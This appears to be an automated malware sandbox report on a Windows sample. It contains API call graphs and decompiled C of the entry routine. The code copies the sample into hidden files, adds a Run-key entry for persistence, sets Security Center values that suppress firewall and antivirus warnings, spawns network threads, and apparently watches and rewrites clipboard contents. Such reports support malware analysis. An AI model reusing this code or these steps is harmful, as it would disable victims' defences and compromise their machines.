5857->5859 5860 4041d1 5858->5860 5861 404257 IsClipboardFormatAvailable 5858->5861 5862 4041e1 5859->5862 5868 404236 5859->5868 5869 40421e SetWindowLongW 5859->5869 5865 4041f4 SetClipboardViewer SetWindowLongW 5860->5865 5866 4041d7 5860->5866 5863 404273 IsClipboardFormatAvailable 5861->5863 5864 40426a 5861->5864 5867 4043d4 DefWindowProcA 5862->5867 5863->5864 5870 404288 IsClipboardFormatAvailable 5863->5870 5873 4042a5 OpenClipboard 5864->5873 5891 40436c 5864->5891 5865->5867 5866->5862 5871 40438d RegisterRawInputDevices ChangeClipboardChain 5866->5871 5868->5862 5872 40423c SendMessageA 5868->5872 5869->5862 5870->5864 5871->5867 5872->5862 5874 4042b5 GetClipboardData 5873->5874 5873->5891 5874->5862 5876 4042cd GlobalLock 5874->5876 5875 404375 SendMessageA 5875->5862 5876->5862 5877 4042e5 5876->5877 5878 4042f8 5877->5878 5879 404319 5877->5879 5881 40432e 5878->5881 5884 4042fe 5878->5884 5880 403fb0 13 API calls 5879->5880 5883 404304 GlobalUnlock CloseClipboard 5880->5883 5898 4040d0 5881->5898 5887 404357 5883->5887 5883->5891 5884->5883 5892 403ef0 5884->5892 5906 403480 lstrlenW 5887->5906 5890 408c70 _invalid_parameter 3 API calls 5890->5891 5891->5862 5891->5875 5893 403efb 5892->5893 5894 403f01 lstrlenW 5893->5894 5895 403f14 5893->5895 5896 408b20 __aligned_recalloc_base 7 API calls 5893->5896 5897 403f31 lstrcpynW 5893->5897 5894->5893 5894->5895 5895->5883 5896->5893 5897->5893 5897->5895 5903 4040dd 5898->5903 5899 4040e3 lstrlenA 5899->5903 5904 4040f6 5899->5904 5900 403e90 2 API calls 5900->5903 5901 408b20 __aligned_recalloc_base 7 API calls 5901->5903 5903->5899 5903->5900 5903->5901 5903->5904 5905 408c70 _invalid_parameter 3 API calls 5903->5905 5943 404080 5903->5943 5904->5883 5905->5903 5913 4034b4 5906->5913 5907 403668 5907->5890 5908 40387b StrStrW 5909 403892 StrStrW 5908->5909 5910 40388e 5908->5910 5911 4038a5 5909->5911 5912 4038a9 StrStrW 5909->5912 5910->5909 5911->5912 5916 4038bc 5912->5916 5913->5907 5914 403763 StrStrW 5913->5914 5920 40367a 5913->5920 5915 40378e StrStrW 5914->5915 5914->5920 5917 4037b9 StrStrW 5915->5917 5915->5920 5916->5907 5918 403926 isalpha 5916->5918 5929 403960 5916->5929 5917->5920 5918->5916 5919 40393d isdigit 5918->5919 5919->5907 5919->5916 5920->5907 5920->5908 5921 403ccb StrStrW 5925 403ce5 StrStrW 5921->5925 5926 403cde 5921->5926 5922 403c7d StrStrW 5923 403c90 5922->5923 5924 403c97 StrStrW 5922->5924 5923->5924 5930 403cb1 StrStrW 5924->5930 5931 403caa 5924->5931 5927 403cf8 5925->5927 5928 403cff StrStrW 5925->5928 5926->5925 5927->5928 5932 403d12 5928->5932 5933 403d19 StrStrW 5928->5933 5929->5921 5929->5922 5930->5921 5934 403cc4 5930->5934 5931->5930 5932->5933 5935 403d33 StrStrW 5933->5935 5936 403d2c 5933->5936 5934->5921 5937 403d46 lstrlenA 5935->5937 5936->5935 5937->5907 5939 403e0c GlobalAlloc 5937->5939 5939->5907 5940 403e27 GlobalLock 5939->5940 5940->5907 5941 403e3a memcpy GlobalUnlock OpenClipboard 5940->5941 5941->5907 5942 403e67 EmptyClipboard SetClipboardData CloseClipboard 5941->5942 5942->5907 5944 40408b 5943->5944 5945 404091 lstrlenA 5944->5945 5946 403e90 2 API calls 5944->5946 5947 4040c4 5944->5947 5945->5944 5946->5944 5947->5903 5512 40ece8 5513 40ecf0 5512->5513 5515 40eda4 5513->5515 5518 40ef2d 5513->5518 5517 40ed29 5517->5515 5522 40ee18 RtlUnwind 5517->5522 5519 40ef42 5518->5519 5521 40ef5e 5518->5521 5520 40efcd NtQueryVirtualMemory 5519->5520 5519->5521 5520->5521 5521->5517 5523 40ee30 5522->5523 5523->5517 5524 40b8f0 5529 40e640 5524->5529 5526 40b905 5527 40b923 5526->5527 5528 40e640 16 API calls 5526->5528 5528->5527 5530 40e650 5529->5530 5548 40e71b 5529->5548 5531 408b00 7 API calls 5530->5531 5530->5548 5532 40e678 5531->5532 5533 408ce0 8 API calls 5532->5533 5532->5548 5534 40e6a4 5533->5534 5535 40e6c0 5534->5535 5536 40e6b1 5534->5536 5549 40e5c0 WSASend 5535->5549 5537 408c70 _invalid_parameter 3 API calls 5536->5537 5539 40e6b7 5537->5539 5539->5526 5540 40e6cd 5541 40e6d6 EnterCriticalSection 5540->5541 5542 40e70c 5540->5542 5543 40e6f9 LeaveCriticalSection 5541->5543 5544 40e6ed 5541->5544 5545 408c70 _invalid_parameter 3 API calls 5542->5545 5543->5526 5544->5543 5546 40e715 5545->5546 5547 408c70 _invalid_parameter 3 API calls 5546->5547 5547->5548 5548->5526 5550 40e630 5549->5550 5551 40e5f2 WSAGetLastError 5549->5551 5550->5540 5551->5550 5552 40e5ff 5551->5552 5553 40e636 5552->5553 5554 40e606 Sleep WSASend 5552->5554 5553->5540 5554->5550 5554->5551 5555 40def0 5556 40df80 5555->5556 5557 40df07 5555->5557 5558 40df17 5557->5558 5559 40df35 EnterCriticalSection 5557->5559 5560 40df6c LeaveCriticalSection DeleteCriticalSection 5559->5560 5563 40df4d 5559->5563 5561 408c70 _invalid_parameter 3 API calls 5560->5561 5561->5556 5562 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5562->5563 5563->5562 5564 40df6b 5563->5564 5564->5560 5565 40ecf0 5566 40ed0e 5565->5566 5568 40eda4 5565->5568 5567 40ef2d NtQueryVirtualMemory 5566->5567 5570 40ed29 5567->5570 5569 40ee18 RtlUnwind 5569->5570 5570->5568 5570->5569 5960 40ea30 GetQueuedCompletionStatus 5961 40ea72 5960->5961 5966 40eae8 5960->5966 5962 40ea77 WSAGetOverlappedResult 5961->5962 5967 40e840 5961->5967 5962->5961 5963 40ea99 WSAGetLastError 5962->5963 5963->5961 5965 40eab3 GetQueuedCompletionStatus 5965->5961 5965->5966 5968 40e9d2 InterlockedDecrement setsockopt closesocket 5967->5968 5969 40e854 5967->5969 5971 40e919 5968->5971 5969->5968 5970 40e85c 5969->5970 5987 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5970->5987 5971->5965 5973 40e861 InterlockedExchange 5974 40e878 5973->5974 5975 40e92e 5973->5975 5974->5971 5980 40e889 InterlockedDecrement 5974->5980 5981 40e89c InterlockedDecrement InterlockedExchangeAdd 5974->5981 5976 40e947 5975->5976 5977 40e937 InterlockedDecrement 5975->5977 5978 40e952 5976->5978 5979 40e967 InterlockedDecrement 5976->5979 5977->5965 5982 40e5c0 4 API calls 5978->5982 5983 40e9c9 5979->5983 5980->5965 5984 40e90f 5981->5984 5985 40e95e 5982->5985 5983->5965 5986 40e7d0 7 API calls 5984->5986 5985->5965 5986->5971 5987->5973 5988 40bfb0 5994 40d8a0 5988->5994 5990 40bfc7 5991 40bff1 5990->5991 5992 40bfd8 WaitForSingleObject 5990->5992 5993 40dd00 8 API calls 5992->5993 5993->5991 5995 40d8ae 5994->5995 6002 40d98e 5994->6002 5996 408b00 7 API calls 5995->5996 5995->6002 5997 40d8be CreateEventA socket 5996->5997 5998 40d8f5 5997->5998 5999 40d8fa 5997->5999 6000 40dd00 8 API calls 5998->6000 6001 40d904 htons setsockopt bind 5999->6001 5999->6002 6000->5999 6003 40d974 CreateThread 6001->6003 6004 40d968 6001->6004 6002->5990 6003->6002 6005 40dd00 8 API calls 6004->6005 6006 40d96d 6005->6006 6006->5990 5571 4054f6 5582 4054d8 5571->5582 5572 405618 Sleep 5572->5582 5573 405509 5574 404c50 4 API calls 5573->5574 5575 40551a 5574->5575 5577 405540 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5575->5577 5581 40553b 5575->5581 5576 405628 ExitThread 5579 4055b6 wsprintfW 5577->5579 5580 4055cb wsprintfW 5577->5580 5578 404cb0 4 API calls 5578->5582 5579->5580 5583 404fc0 49 API calls 5580->5583 5582->5572 5582->5573 5582->5576 5582->5578 5583->5581 5584 405df6 ExitThread 6007 406639 6008 406642 6007->6008 6009 406651 34 API calls 6008->6009 6010 407486 6008->6010 5585 40da7f 5588 40da40 5585->5588 5586 40daab memmove 5586->5588 5587 40dabe 5588->5586 5588->5587

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 0 405e10-405e2e Sleep 1 405e38-405e44 0->1 2 405e46-405e53 PathFileExistsW 1->2 3 405e98-405eb8 CreateMutexA GetLastError 1->3 4 405e55-405e81 CopyFileW MoveFileA MoveFileW 2->4 5 405e87-405e96 2->5 6 405ec2-405f47 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->6 7 405eba-405ebc ExitProcess 3->7 4->5 5->1 8 405f4d-405f66 6->8 9 405fb3-405fb8 8->9 10 405f68-405f70 8->10 13 405fbe-405fd1 9->13 11 405f72-405f8d 10->11 12 405fa7-405fb1 10->12 11->9 14 405f8f-405fa5 11->14 12->13 15 405fd7-405fe2 call 40d0f0 13->15 16 40623a-406265 Sleep RegOpenKeyExA 13->16 14->8 14->12 24 405fe4-405fe6 ExitProcess 15->24 25 405fec-40603a ExpandEnvironmentStringsW wsprintfW CopyFileW 15->25 17 406351-406371 RegOpenKeyExA 16->17 18 40626b-40634b RegSetValueExA * 7 RegCloseKey 16->18 20 406377-406457 RegSetValueExA * 7 RegCloseKey 17->20 21 40645d-406472 Sleep call 40b1c0 17->21 18->17 20->21 31 4065c8-4065d1 21->31 32 406478-4065c5 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 4045f0 call 40d020 call 405ba0 CreateEventA call 40a8f0 call 40baf0 call 409d40 call 40bba0 * 4 21->32 26 406040-40606f SetFileAttributesW RegOpenKeyExW 25->26 27 406119-40615b Sleep wsprintfW CopyFileW 25->27 29 406075-40608a 26->29 30 4060fa-40610f call 40d390 26->30 27->16 33 406161-406190 SetFileAttributesW RegOpenKeyExW 27->33 34 406090-4060af 29->34 30->27 47 406111-406113 ExitProcess 30->47 32->31 37 406196-4061ab 33->37 38 40621b-406230 call 40d390 33->38 34->34 41 4060b1-4060f4 RegSetValueExW RegCloseKey 34->41 44 4061b1-4061d0 37->44 38->16 50 406232-406234 ExitProcess 38->50 41->30 44->44 49 4061d2-406215 RegSetValueExW RegCloseKey 44->49 49->38
                                                                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                    			_entry_() {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                                                                                                    				int _v532;
                                                                                                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                                                                                                    				char _v1060;
                                                                                                                                                                                                                                                                                    				void* _v1064;
                                                                                                                                                                                                                                                                                    				char _v1588;
                                                                                                                                                                                                                                                                                    				short _v2108;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2112;
                                                                                                                                                                                                                                                                                    				short _v2636;
                                                                                                                                                                                                                                                                                    				void* _v2640;
                                                                                                                                                                                                                                                                                    				char _v3044;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3048;
                                                                                                                                                                                                                                                                                    				int _v3052;
                                                                                                                                                                                                                                                                                    				short _v3054;
                                                                                                                                                                                                                                                                                    				short _v3056;
                                                                                                                                                                                                                                                                                    				int _v3060;
                                                                                                                                                                                                                                                                                    				int _v3064;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3068;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3072;
                                                                                                                                                                                                                                                                                    				short _v3074;
                                                                                                                                                                                                                                                                                    				signed int _v3080;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v3084;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3088;
                                                                                                                                                                                                                                                                                    				short _v3090;
                                                                                                                                                                                                                                                                                    				signed int _v3096;
                                                                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                                                                    				int _t129;
                                                                                                                                                                                                                                                                                    				intOrPtr _t149;
                                                                                                                                                                                                                                                                                    				signed char _t192;
                                                                                                                                                                                                                                                                                    				signed char _t203;
                                                                                                                                                                                                                                                                                    				int _t210;
                                                                                                                                                                                                                                                                                    				short _t215;
                                                                                                                                                                                                                                                                                    				intOrPtr _t219;
                                                                                                                                                                                                                                                                                    				short _t245;
                                                                                                                                                                                                                                                                                    				intOrPtr _t253;
                                                                                                                                                                                                                                                                                    				intOrPtr _t254;
                                                                                                                                                                                                                                                                                    				void* _t278;
                                                                                                                                                                                                                                                                                    				void* _t279;
                                                                                                                                                                                                                                                                                    				void* _t286;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0xbb8); // executed
                                                                                                                                                                                                                                                                                    				_v536 = 0;
                                                                                                                                                                                                                                                                                    				_v2112 = 0x235a;
                                                                                                                                                                                                                                                                                    				while(_v536 < _v2112) {
                                                                                                                                                                                                                                                                                    					_t210 = PathFileExistsW(L"2393737939739"); // executed
                                                                                                                                                                                                                                                                                    					if(_t210 != 0) {
                                                                                                                                                                                                                                                                                    						CopyFileW(L"297973937,", L"33973397337", 0);
                                                                                                                                                                                                                                                                                    						MoveFileA("337372927", "2282688262");
                                                                                                                                                                                                                                                                                    						MoveFileW(L"038038", L"333383737");
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v536 = _v536 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t121 = CreateMutexA(0, 0, "2u9o0b7n"); // executed
                                                                                                                                                                                                                                                                                    				_v2640 = _t121;
                                                                                                                                                                                                                                                                                    				if(GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                                                    					_v1064 = 0;
                                                                                                                                                                                                                                                                                    					_v528 = 1;
                                                                                                                                                                                                                                                                                    					GetModuleFileNameW(0, 0x4169d8, 0x105);
                                                                                                                                                                                                                                                                                    					_v532 = PathFindFileNameW(0x4169d8);
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v524, L"%s:Zone.Identifier", 0x4169d8);
                                                                                                                                                                                                                                                                                    					_t279 = _t278 + 0xc;
                                                                                                                                                                                                                                                                                    					DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                                    					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                                                                                                                                                                                                                    					_v3048 = 0x414bf0;
                                                                                                                                                                                                                                                                                    					_v3052 = _v532;
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						_t129 = _v3052;
                                                                                                                                                                                                                                                                                    						_t215 =  *_t129;
                                                                                                                                                                                                                                                                                    						_v3054 = _t215;
                                                                                                                                                                                                                                                                                    						if(_t215 !=  *_v3048) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_v3054 == 0) {
                                                                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                                                                    							_v3060 = 0;
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							_v3064 = _v3060;
                                                                                                                                                                                                                                                                                    							if(_v3064 == 0) {
                                                                                                                                                                                                                                                                                    								L31:
                                                                                                                                                                                                                                                                                    								Sleep(0x1f4);
                                                                                                                                                                                                                                                                                    								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064) == 0) {
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064) == 0) {
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								Sleep(0x1f4);
                                                                                                                                                                                                                                                                                    								if((E0040B1C0() & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    									__imp__#115(0x202,  &_v3044);
                                                                                                                                                                                                                                                                                    									wsprintfW(0x416be8, L"%s\\tbnds.dat",  &_v2636);
                                                                                                                                                                                                                                                                                    									wsprintfW(0x4165c8, L"%s\\tbcmds.dat",  &_v2636);
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E004043F0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E004054A0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E00405CF0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									Sleep(0x2710);
                                                                                                                                                                                                                                                                                    									E004045F0();
                                                                                                                                                                                                                                                                                    									E00405BA0(E0040D020(),  &_v2636);
                                                                                                                                                                                                                                                                                    									 *0x416e0c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    									 *0x416e14 = E0040A8F0( &_v2636);
                                                                                                                                                                                                                                                                                    									 *0x416e10 = E0040BAF0( &_v2636);
                                                                                                                                                                                                                                                                                    									E00409D40();
                                                                                                                                                                                                                                                                                    									_t253 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t253, 0, E0040BFB0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									_t149 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t149, 0, E0040BF10, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									_t219 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t219, 0, E0040BAA0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									_t254 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t254, 0, E0040B8A0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if((E0040D0F0() & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                                                                                                                                                                                                                    								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, 0x414bf0);
                                                                                                                                                                                                                                                                                    								_t286 = _t279 + 0x10;
                                                                                                                                                                                                                                                                                    								if(CopyFileW(0x4169d8,  &_v1588, 0) == 0) {
                                                                                                                                                                                                                                                                                    									L24:
                                                                                                                                                                                                                                                                                    									Sleep(0x1f4);
                                                                                                                                                                                                                                                                                    									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, 0x414bf0);
                                                                                                                                                                                                                                                                                    									_t279 = _t286 + 0x10;
                                                                                                                                                                                                                                                                                    									if(CopyFileW(0x4169d8,  &_v1060, 0) == 0) {
                                                                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									SetFileAttributesW( &_v1060, 3);
                                                                                                                                                                                                                                                                                    									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                                                                                                    										_t192 = E0040D390( &_v1060);
                                                                                                                                                                                                                                                                                    										_t279 = _t279 + 4;
                                                                                                                                                                                                                                                                                    										if((_t192 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    											goto L31;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										ExitProcess(0);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v3084 =  &_v1060;
                                                                                                                                                                                                                                                                                    									_v3088 = _v3084 + 2;
                                                                                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                                                                                    										_v3090 =  *_v3084;
                                                                                                                                                                                                                                                                                    										_v3084 = _v3084 + 2;
                                                                                                                                                                                                                                                                                    									} while (_v3090 != 0);
                                                                                                                                                                                                                                                                                    									_v3096 = _v3084 - _v3088 >> 1;
                                                                                                                                                                                                                                                                                    									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3096 + _v3096 + 2);
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								SetFileAttributesW( &_v1588, 3);
                                                                                                                                                                                                                                                                                    								if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                                    									L22:
                                                                                                                                                                                                                                                                                    									_t203 = E0040D390( &_v1588);
                                                                                                                                                                                                                                                                                    									_t286 = _t286 + 4;
                                                                                                                                                                                                                                                                                    									if((_t203 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    										goto L24;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									ExitProcess(0);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v3068 =  &_v1588;
                                                                                                                                                                                                                                                                                    								_v3072 = _v3068 + 2;
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									_v3074 =  *_v3068;
                                                                                                                                                                                                                                                                                    									_v3068 = _v3068 + 2;
                                                                                                                                                                                                                                                                                    								} while (_v3074 != 0);
                                                                                                                                                                                                                                                                                    								_v3080 = _v3068 - _v3072 >> 1;
                                                                                                                                                                                                                                                                                    								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3080 + _v3080 + 2);
                                                                                                                                                                                                                                                                                    								RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							ExitProcess(0);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t129 = _v3052;
                                                                                                                                                                                                                                                                                    						_t245 =  *((intOrPtr*)(_t129 + 2));
                                                                                                                                                                                                                                                                                    						_v3056 = _t245;
                                                                                                                                                                                                                                                                                    						_t25 = _v3048 + 2; // 0x790073
                                                                                                                                                                                                                                                                                    						if(_t245 !=  *_t25) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v3052 = _v3052 + 4;
                                                                                                                                                                                                                                                                                    						_v3048 = _v3048 + 4;
                                                                                                                                                                                                                                                                                    						if(_v3056 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                    					asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                                                                    					_v3060 = _t129;
                                                                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				ExitProcess(0); // executed
                                                                                                                                                                                                                                                                                    			}











































                                                                                                                                                                                                                                                                                    0x00405e1e
                                                                                                                                                                                                                                                                                    0x00405e24
                                                                                                                                                                                                                                                                                    0x00405e2e
                                                                                                                                                                                                                                                                                    0x00405e38
                                                                                                                                                                                                                                                                                    0x00405e4b
                                                                                                                                                                                                                                                                                    0x00405e53
                                                                                                                                                                                                                                                                                    0x00405e61
                                                                                                                                                                                                                                                                                    0x00405e71
                                                                                                                                                                                                                                                                                    0x00405e81
                                                                                                                                                                                                                                                                                    0x00405e81
                                                                                                                                                                                                                                                                                    0x00405e90
                                                                                                                                                                                                                                                                                    0x00405e90
                                                                                                                                                                                                                                                                                    0x00405ea1
                                                                                                                                                                                                                                                                                    0x00405ea7
                                                                                                                                                                                                                                                                                    0x00405eb8
                                                                                                                                                                                                                                                                                    0x00405ec2
                                                                                                                                                                                                                                                                                    0x00405ecc
                                                                                                                                                                                                                                                                                    0x00405ee2
                                                                                                                                                                                                                                                                                    0x00405ef3
                                                                                                                                                                                                                                                                                    0x00405f0a
                                                                                                                                                                                                                                                                                    0x00405f10
                                                                                                                                                                                                                                                                                    0x00405f1a
                                                                                                                                                                                                                                                                                    0x00405f31
                                                                                                                                                                                                                                                                                    0x00405f37
                                                                                                                                                                                                                                                                                    0x00405f47
                                                                                                                                                                                                                                                                                    0x00405f4d
                                                                                                                                                                                                                                                                                    0x00405f4d
                                                                                                                                                                                                                                                                                    0x00405f53
                                                                                                                                                                                                                                                                                    0x00405f56
                                                                                                                                                                                                                                                                                    0x00405f66
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405f70
                                                                                                                                                                                                                                                                                    0x00405fa7
                                                                                                                                                                                                                                                                                    0x00405fa7
                                                                                                                                                                                                                                                                                    0x00405fbe
                                                                                                                                                                                                                                                                                    0x00405fc4
                                                                                                                                                                                                                                                                                    0x00405fd1
                                                                                                                                                                                                                                                                                    0x0040623a
                                                                                                                                                                                                                                                                                    0x0040623f
                                                                                                                                                                                                                                                                                    0x00406265
                                                                                                                                                                                                                                                                                    0x00406284
                                                                                                                                                                                                                                                                                    0x004062a3
                                                                                                                                                                                                                                                                                    0x004062c2
                                                                                                                                                                                                                                                                                    0x004062e1
                                                                                                                                                                                                                                                                                    0x00406300
                                                                                                                                                                                                                                                                                    0x0040631f
                                                                                                                                                                                                                                                                                    0x0040633e
                                                                                                                                                                                                                                                                                    0x0040634b
                                                                                                                                                                                                                                                                                    0x0040634b
                                                                                                                                                                                                                                                                                    0x00406371
                                                                                                                                                                                                                                                                                    0x00406390
                                                                                                                                                                                                                                                                                    0x004063af
                                                                                                                                                                                                                                                                                    0x004063ce
                                                                                                                                                                                                                                                                                    0x004063ed
                                                                                                                                                                                                                                                                                    0x0040640c
                                                                                                                                                                                                                                                                                    0x0040642b
                                                                                                                                                                                                                                                                                    0x0040644a
                                                                                                                                                                                                                                                                                    0x00406457
                                                                                                                                                                                                                                                                                    0x00406457
                                                                                                                                                                                                                                                                                    0x00406462
                                                                                                                                                                                                                                                                                    0x00406472
                                                                                                                                                                                                                                                                                    0x00406484
                                                                                                                                                                                                                                                                                    0x0040649b
                                                                                                                                                                                                                                                                                    0x004064b5
                                                                                                                                                                                                                                                                                    0x004064cd
                                                                                                                                                                                                                                                                                    0x004064d8
                                                                                                                                                                                                                                                                                    0x004064ed
                                                                                                                                                                                                                                                                                    0x004064f8
                                                                                                                                                                                                                                                                                    0x0040650d
                                                                                                                                                                                                                                                                                    0x00406518
                                                                                                                                                                                                                                                                                    0x0040651e
                                                                                                                                                                                                                                                                                    0x00406528
                                                                                                                                                                                                                                                                                    0x0040653b
                                                                                                                                                                                                                                                                                    0x00406545
                                                                                                                                                                                                                                                                                    0x0040654f
                                                                                                                                                                                                                                                                                    0x00406554
                                                                                                                                                                                                                                                                                    0x00406566
                                                                                                                                                                                                                                                                                    0x0040656d
                                                                                                                                                                                                                                                                                    0x00406582
                                                                                                                                                                                                                                                                                    0x00406588
                                                                                                                                                                                                                                                                                    0x0040659d
                                                                                                                                                                                                                                                                                    0x004065a4
                                                                                                                                                                                                                                                                                    0x004065b9
                                                                                                                                                                                                                                                                                    0x004065c0
                                                                                                                                                                                                                                                                                    0x004065c5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004065cc
                                                                                                                                                                                                                                                                                    0x00405fe2
                                                                                                                                                                                                                                                                                    0x00405ffd
                                                                                                                                                                                                                                                                                    0x0040601b
                                                                                                                                                                                                                                                                                    0x00406021
